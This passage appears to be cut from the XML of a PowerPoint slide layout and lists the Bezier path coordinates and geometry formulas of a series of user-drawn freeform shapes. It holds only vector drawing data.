                      <a:pt x="73" y="30"/>
                      <a:pt x="71" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="30"/>
                      <a:pt x="67" y="32"/>
                      <a:pt x="66" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="39"/>
                      <a:pt x="64" y="44"/>
                      <a:pt x="66" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="50"/>
                      <a:pt x="68" y="51"/>
                      <a:pt x="68" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="51"/>
                      <a:pt x="70" y="50"/>
                      <a:pt x="70" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="48"/>
                      <a:pt x="68" y="48"/>
                      <a:pt x="67" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="45"/>
                      <a:pt x="66" y="42"/>
                      <a:pt x="67" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="37"/>
                      <a:pt x="71" y="36"/>
                      <a:pt x="73" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="39"/>
                      <a:pt x="75" y="42"/>
                      <a:pt x="75" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="46"/>
                      <a:pt x="75" y="47"/>
                      <a:pt x="73" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="48"/>
                      <a:pt x="73" y="48"/>
                      <a:pt x="73" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="51"/>
                      <a:pt x="69" y="52"/>
                      <a:pt x="67" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="54"/>
                      <a:pt x="65" y="55"/>
                      <a:pt x="64" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="57"/>
                      <a:pt x="64" y="58"/>
                      <a:pt x="65" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="60"/>
                      <a:pt x="68" y="61"/>
                      <a:pt x="68" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="65"/>
                      <a:pt x="74" y="66"/>
                      <a:pt x="78" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="66"/>
                      <a:pt x="87" y="64"/>
                      <a:pt x="91" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="62"/>
                      <a:pt x="99" y="61"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="57"/>
                      <a:pt x="103" y="57"/>
                      <a:pt x="103" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="58"/>
                      <a:pt x="104" y="59"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="63"/>
                      <a:pt x="92" y="65"/>
                      <a:pt x="87" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="68"/>
                      <a:pt x="79" y="69"/>
                      <a:pt x="75" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="68"/>
                      <a:pt x="72" y="68"/>
                      <a:pt x="71" y="68"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="43"/>
                      <a:pt x="73" y="41"/>
                      <a:pt x="72" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="39"/>
                      <a:pt x="71" y="39"/>
                      <a:pt x="71" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="41"/>
                      <a:pt x="72" y="42"/>
                      <a:pt x="72" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="44"/>
                      <a:pt x="72" y="45"/>
                      <a:pt x="73" y="45"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="97" y="39"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="40"/>
                      <a:pt x="100" y="41"/>
                      <a:pt x="100" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="41"/>
                      <a:pt x="101" y="40"/>
                      <a:pt x="100" y="39"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99"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Freeform 86"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6802" y="2978"/>
                <a:ext cx="3" cy="3"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 3 w 3"/>
                  <a:gd name="T1" fmla="*/ 1 h 3"/>
                  <a:gd name="T2" fmla="*/ 2 w 3"/>
                  <a:gd name="T3" fmla="*/ 2 h 3"/>
                  <a:gd name="T4" fmla="*/ 0 w 3"/>
                  <a:gd name="T5" fmla="*/ 3 h 3"/>
                  <a:gd name="T6" fmla="*/ 1 w 3"/>
                  <a:gd name="T7" fmla="*/ 1 h 3"/>
                  <a:gd name="T8" fmla="*/ 2 w 3"/>
                  <a:gd name="T9" fmla="*/ 0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cubicBezTo>
                      <a:pt x="2" y="1"/>
                      <a:pt x="2" y="2"/>
                      <a:pt x="2" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="2"/>
                      <a:pt x="1" y="3"/>
                      <a:pt x="0" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="2"/>
                      <a:pt x="0" y="2"/>
                      <a:pt x="1" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="1"/>
                      <a:pt x="2" y="1"/>
                      <a:pt x="2" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="0"/>
                      <a:pt x="3"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Freeform 87"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6815" y="2978"/>
                <a:ext cx="4" cy="2"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3"/>
                  <a:gd name="T1" fmla="*/ 0 h 2"/>
                  <a:gd name="T2" fmla="*/ 2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2"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Freeform 88"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="203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7"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Freeform 89"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="222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Freeform 90"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2425" y="3657"/>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Freeform 91"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2573"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Freeform 92"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2768"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6" name="Freeform 93"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2965"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7" name="Freeform 94"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3114"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Freeform 95"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3311" y="3657"/>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96"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3460"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Freeform 97"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3609"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1" y="36"/>
                      <a:pt x="17" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="18"/>
                      <a:pt x="30"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98"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3794" y="366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2" name="Freeform 99"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4223"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1 w 63"/>
                  <a:gd name="T19" fmla="*/ 44 h 240"/>
                  <a:gd name="T20" fmla="*/ 41 w 63"/>
                  <a:gd name="T21" fmla="*/ 84 h 240"/>
                  <a:gd name="T22" fmla="*/ 21 w 63"/>
                  <a:gd name="T23" fmla="*/ 120 h 240"/>
                  <a:gd name="T24" fmla="*/ 21 w 63"/>
                  <a:gd name="T25" fmla="*/ 120 h 240"/>
                  <a:gd name="T26" fmla="*/ 41 w 63"/>
                  <a:gd name="T27" fmla="*/ 155 h 240"/>
                  <a:gd name="T28" fmla="*/ 41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1" y="26"/>
                      <a:pt x="41" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="84"/>
                      <a:pt x="41" y="84"/>
                      <a:pt x="41" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="103"/>
                      <a:pt x="34" y="115"/>
                      <a:pt x="21" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="120"/>
                      <a:pt x="21" y="120"/>
                      <a:pt x="21" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="124"/>
                      <a:pt x="41" y="136"/>
                      <a:pt x="41" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="195"/>
                      <a:pt x="41" y="195"/>
                      <a:pt x="41" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="205"/>
                      <a:pt x="43" y="212"/>
                      <a:pt x="46" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49"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3" name="Freeform 100"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4330" y="3663"/>
                <a:ext cx="77" cy="293"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 63"/>
                  <a:gd name="T1" fmla="*/ 128 h 240"/>
                  <a:gd name="T2" fmla="*/ 42 w 63"/>
                  <a:gd name="T3" fmla="*/ 157 h 240"/>
                  <a:gd name="T4" fmla="*/ 42 w 63"/>
                  <a:gd name="T5" fmla="*/ 198 h 240"/>
                  <a:gd name="T6" fmla="*/ 0 w 63"/>
                  <a:gd name="T7" fmla="*/ 240 h 240"/>
                  <a:gd name="T8" fmla="*/ 0 w 63"/>
                  <a:gd name="T9" fmla="*/ 223 h 240"/>
                  <a:gd name="T10" fmla="*/ 17 w 63"/>
                  <a:gd name="T11" fmla="*/ 216 h 240"/>
                  <a:gd name="T12" fmla="*/ 22 w 63"/>
                  <a:gd name="T13" fmla="*/ 195 h 240"/>
                  <a:gd name="T14" fmla="*/ 22 w 63"/>
                  <a:gd name="T15" fmla="*/ 155 h 240"/>
                  <a:gd name="T16" fmla="*/ 42 w 63"/>
                  <a:gd name="T17" fmla="*/ 120 h 240"/>
                  <a:gd name="T18" fmla="*/ 42 w 63"/>
                  <a:gd name="T19" fmla="*/ 120 h 240"/>
                  <a:gd name="T20" fmla="*/ 22 w 63"/>
                  <a:gd name="T21" fmla="*/ 84 h 240"/>
                  <a:gd name="T22" fmla="*/ 22 w 63"/>
                  <a:gd name="T23" fmla="*/ 44 h 240"/>
                  <a:gd name="T24" fmla="*/ 0 w 63"/>
                  <a:gd name="T25" fmla="*/ 17 h 240"/>
                  <a:gd name="T26" fmla="*/ 0 w 63"/>
                  <a:gd name="T27" fmla="*/ 0 h 240"/>
                  <a:gd name="T28" fmla="*/ 42 w 63"/>
                  <a:gd name="T29" fmla="*/ 43 h 240"/>
                  <a:gd name="T30" fmla="*/ 42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4" name="Freeform 101"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4441"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Freeform 102"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4636"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8"/>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6" name="Freeform 103"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4833"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Freeform 104"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4982" y="3658"/>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8" name="Freeform 105"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5180" y="3657"/>
                <a:ext cx="82"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5"/>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Freeform 106"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5330"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5"/>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0" name="Freeform 107"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5477" y="3658"/>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3"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Freeform 108"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="567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2" name="Freeform 109"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5824" y="3657"/>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3" name="Freeform 110"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="597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4" name="Freeform 111"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="616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Freeform 112"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6362"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Freeform 113"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6557" y="3658"/>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8"/>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7" name="Freeform 114"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6754"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5"/>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8" name="Freeform 115"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6897" y="3663"/>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2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2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="43"/>
                      <a:pt x="21" y="43"/>
                      <a:pt x="21" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="14"/>
                      <a:pt x="35" y="0"/>
                      <a:pt x="63" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="17"/>
                      <a:pt x="63" y="17"/>
                      <a:pt x="63" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="17"/>
                      <a:pt x="42" y="26"/>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Freeform 116"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7004" y="3663"/>
                <a:ext cx="78"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2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8"/>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3"/>
                      <a:pt x="22" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="44"/>
                      <a:pt x="22" y="44"/>
                      <a:pt x="22" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="26"/>
                      <a:pt x="15" y="17"/>
                      <a:pt x="0" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="0"/>
                      <a:pt x="42" y="14"/>
                      <a:pt x="42" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="82"/>
                      <a:pt x="42" y="82"/>
                      <a:pt x="42" y="82"/>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Freeform 117"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7116"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Freeform 118"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7311" y="3658"/>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Freeform 119"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7509" y="3657"/>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5"/>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Freeform 120"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7657" y="3657"/>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5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="32"/>
                      <a:pt x="0" y="32"/>
                      <a:pt x="0" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="30"/>
                      <a:pt x="10" y="29"/>
                      <a:pt x="16" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="24"/>
                      <a:pt x="27" y="21"/>
                      <a:pt x="32" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37"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Freeform 121"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3990" y="3650"/>
                <a:ext cx="218" cy="255"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 175 w 179"/>
                  <a:gd name="T1" fmla="*/ 174 h 209"/>
                  <a:gd name="T2" fmla="*/ 134 w 179"/>
                  <a:gd name="T3" fmla="*/ 209 h 209"/>
                  <a:gd name="T4" fmla="*/ 80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1 w 179"/>
                  <a:gd name="T23" fmla="*/ 83 h 209"/>
                  <a:gd name="T24" fmla="*/ 58 w 179"/>
                  <a:gd name="T25" fmla="*/ 27 h 209"/>
                  <a:gd name="T26" fmla="*/ 117 w 179"/>
                  <a:gd name="T27" fmla="*/ 18 h 209"/>
                  <a:gd name="T28" fmla="*/ 159 w 179"/>
                  <a:gd name="T29" fmla="*/ 128 h 209"/>
                  <a:gd name="T30" fmla="*/ 152 w 179"/>
                  <a:gd name="T31" fmla="*/ 152 h 209"/>
                  <a:gd name="T32" fmla="*/ 128 w 179"/>
                  <a:gd name="T33" fmla="*/ 151 h 209"/>
                  <a:gd name="T34" fmla="*/ 122 w 179"/>
                  <a:gd name="T35" fmla="*/ 186 h 209"/>
                  <a:gd name="T36" fmla="*/ 165 w 179"/>
                  <a:gd name="T37" fmla="*/ 186 h 209"/>
                  <a:gd name="T38" fmla="*/ 171 w 179"/>
                  <a:gd name="T39" fmla="*/ 174 h 209"/>
                  <a:gd name="T40" fmla="*/ 160 w 179"/>
                  <a:gd name="T41" fmla="*/ 153 h 209"/>
                  <a:gd name="T42" fmla="*/ 88 w 179"/>
                  <a:gd name="T43" fmla="*/ 72 h 209"/>
                  <a:gd name="T44" fmla="*/ 101 w 179"/>
                  <a:gd name="T45" fmla="*/ 68 h 209"/>
                  <a:gd name="T46" fmla="*/ 73 w 179"/>
                  <a:gd name="T47" fmla="*/ 79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8 h 209"/>
                  <a:gd name="T84" fmla="*/ 86 w 179"/>
                  <a:gd name="T85" fmla="*/ 42 h 209"/>
                  <a:gd name="T86" fmla="*/ 77 w 179"/>
                  <a:gd name="T87" fmla="*/ 44 h 209"/>
                  <a:gd name="T88" fmla="*/ 65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1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5"/>
                      <a:pt x="166" y="169"/>
                      <a:pt x="170" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="172" y="172"/>
                      <a:pt x="174" y="173"/>
                      <a:pt x="175" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="177"/>
                      <a:pt x="179" y="180"/>
                      <a:pt x="175" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="186"/>
                      <a:pt x="169" y="188"/>
                      <a:pt x="166" y="189"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="156" y="193"/>
                      <a:pt x="148" y="199"/>
                      <a:pt x="141" y="206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="208"/>
                      <a:pt x="136" y="208"/>
                      <a:pt x="134" y="209"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="209"/>
                      <a:pt x="127" y="209"/>
                      <a:pt x="124" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="207"/>
                      <a:pt x="119" y="206"/>
                      <a:pt x="118" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="200"/>
                      <a:pt x="113" y="198"/>
                      <a:pt x="109" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="198"/>
                      <a:pt x="90" y="198"/>
                      <a:pt x="80" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="198"/>
                      <a:pt x="71" y="199"/>
                      <a:pt x="67" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="203"/>
                      <a:pt x="64" y="204"/>
                      <a:pt x="62" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="208"/>
                      <a:pt x="53" y="209"/>
                      <a:pt x="48" y="207"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="206"/>
                      <a:pt x="37" y="203"/>
                      <a:pt x="32" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="200"/>
                      <a:pt x="18" y="199"/>
                      <a:pt x="11" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="197"/>
                      <a:pt x="6" y="196"/>
                      <a:pt x="4" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="194"/>
                      <a:pt x="0" y="191"/>
                      <a:pt x="1" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="187"/>
                      <a:pt x="1" y="185"/>
                      <a:pt x="2" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="180"/>
                      <a:pt x="4" y="176"/>
                      <a:pt x="3" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="170"/>
                      <a:pt x="2" y="168"/>
                      <a:pt x="2" y="167"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="162"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="7" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="160"/>
                      <a:pt x="12" y="160"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="158"/>
                      <a:pt x="22" y="155"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="153"/>
                      <a:pt x="23" y="160"/>
                      <a:pt x="17" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="162"/>
                      <a:pt x="12" y="163"/>
                      <a:pt x="9" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="162"/>
                      <a:pt x="9" y="162"/>
                      <a:pt x="8" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="162"/>
                      <a:pt x="3" y="164"/>
                      <a:pt x="4" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="169"/>
                      <a:pt x="5" y="171"/>
                      <a:pt x="6" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="176"/>
                      <a:pt x="8" y="180"/>
                      <a:pt x="6" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="185"/>
                      <a:pt x="5" y="186"/>
                      <a:pt x="4" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="190"/>
                      <a:pt x="4" y="192"/>
                      <a:pt x="6" y="193"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="193"/>
                      <a:pt x="11" y="194"/>
                      <a:pt x="13" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="196"/>
                      <a:pt x="35" y="199"/>
                      <a:pt x="45" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="203"/>
                      <a:pt x="52" y="204"/>
                      <a:pt x="55" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="202"/>
                      <a:pt x="66" y="197"/>
                      <a:pt x="64" y="190"/>
